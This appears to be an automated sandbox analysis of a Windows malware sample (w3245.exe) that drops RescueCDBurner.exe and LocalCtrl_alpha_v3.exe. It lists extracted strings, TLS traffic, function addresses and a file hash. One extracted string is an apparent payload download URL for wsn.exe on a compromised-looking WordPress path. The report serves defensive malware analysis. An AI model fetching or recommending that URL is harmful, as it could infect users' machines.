Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.it/
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.it/reimpostare-passwordi-di-windows-login.html
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.jp/
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.kr/
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.net/
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/n
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.pl/
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurcha
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.reneelab.ru/
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000000.1972974789.00000001401E0000.00000002.00000001.01000000.0000001C.sdmpString found in binary or memory: http://www.softwareok.com
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000000.1972974789.00000001401E0000.00000002.00000001.01000000.0000001C.sdmpString found in binary or memory: http://www.softwareok.de
Source: cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.surfok.de/
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
Source: RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipbo
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
Source: RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.winimage.com/zLibDll1.2.6
Source: RescueCDBurner.exe, 00000002.00000002.1715868582.000000006BED9000.00000002.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000002.00000003.1697665872.0000000001812000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1777625557.000000006CC89000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: RescueCDBurner.exe, 00000002.00000002.1715868582.000000006BED9000.00000002.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000002.00000003.1697665872.0000000001812000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1777625557.000000006CC89000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://xml.org/sax/features/namespaces
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2147363462.000000000050D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://avrupabaski.com/wp-content/upgrade/wsn.exe
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com.cn/download_api.php
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com.cn/passnow/passnow_
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/download_api.php
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/passnow/passnow_
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.reneelab.com
Source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.reneelab.comwww.reneelab.comhttp://https://0
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49911 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49919 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49929 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49938 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49946 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49953 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49954 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49960 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49966 version: TLS 1.2
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB43C8C _CreateDesktop_@24,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,GlobalAlloc,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,strcpy,strcpy,CreateDesktopA,lstrlenA,MultiByteToWideChar,GlobalFree,lstrlenA,MultiByteToWideChar,GlobalFree,lstrlenA,MultiByteToWideChar,GlobalFree,lstrlenA,MultiByteToWideChar,GlobalFree,GlobalFree,1_2_5BB43C8C
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB3EEEA _CreateProcessAsUser_@44,SetLastError,newMultiByteFromWideChar,newMultiByteFromWideChar,newMultiByteFromWideChar,memset,newMultiByteFromWideChar,CreateProcessAsUserA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,1_2_5BB3EEEA
Source: C:\Users\user\Desktop\w3245.exeFile deleted: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeJump to behavior
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007F001D0_2_007F001D
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007E41EA0_2_007E41EA
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007C62AA0_2_007C62AA
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007EC3320_2_007EC332
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007F03D50_2_007F03D5
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007FA5600_2_007FA560
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007F07AA0_2_007F07AA
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007CA8F10_2_007CA8F1
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007FAA0E0_2_007FAA0E
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007F0B6F0_2_007F0B6F
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007EFB890_2_007EFB89
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007F2C180_2_007F2C18
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007FEE7C0_2_007FEE7C
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007F2E470_2_007F2E47
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A3001D1_2_00A3001D
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A241EA1_2_00A241EA
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A062AA1_2_00A062AA
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A303D51_2_00A303D5
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A2C3321_2_00A2C332
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A3A5601_2_00A3A560
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A307AA1_2_00A307AA
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A0A8F11_2_00A0A8F1
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A3AA0E1_2_00A3AA0E
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A2FB891_2_00A2FB89
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A30B6F1_2_00A30B6F
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A32C181_2_00A32C18
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A3EE7C1_2_00A3EE7C
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A32E471_2_00A32E47
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB31FA01_2_5BB31FA0
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB3FF2C1_2_5BB3FF2C
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BDCA3DD2_2_6BDCA3DD
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BD843A62_2_6BD843A6
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BD8A2A72_2_6BD8A2A7
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BD872702_2_6BD87270
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BE17A5A2_2_6BE17A5A
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BD83A1C2_2_6BD83A1C
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BD721F02_2_6BD721F0
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BDA09192_2_6BDA0919
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BD9911E2_2_6BD9911E
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BD870932_2_6BD87093
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BD88F832_2_6BD88F83
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BD897A02_2_6BD897A0
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BD8867F2_2_6BD8867F
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BD83DD02_2_6BD83DD0
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BD9457E2_2_6BD9457E
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BD89D652_2_6BD89D65
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BDBECCD2_2_6BDBECCD
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
Source: C:\Users\user\Desktop\w3245.exeCode function: String function: 00800726 appears 34 times
Source: C:\Users\user\Desktop\w3245.exeCode function: String function: 007C1F13 appears 54 times
Source: C:\Users\user\Desktop\w3245.exeCode function: String function: 007C3821 appears 500 times
Source: C:\Users\user\Desktop\w3245.exeCode function: String function: 00800237 appears 684 times
Source: C:\Users\user\Desktop\w3245.exeCode function: String function: 008032F3 appears 85 times
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: String function: 6BD80C80 appears 46 times
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: String function: 6BD8B046 appears 50 times
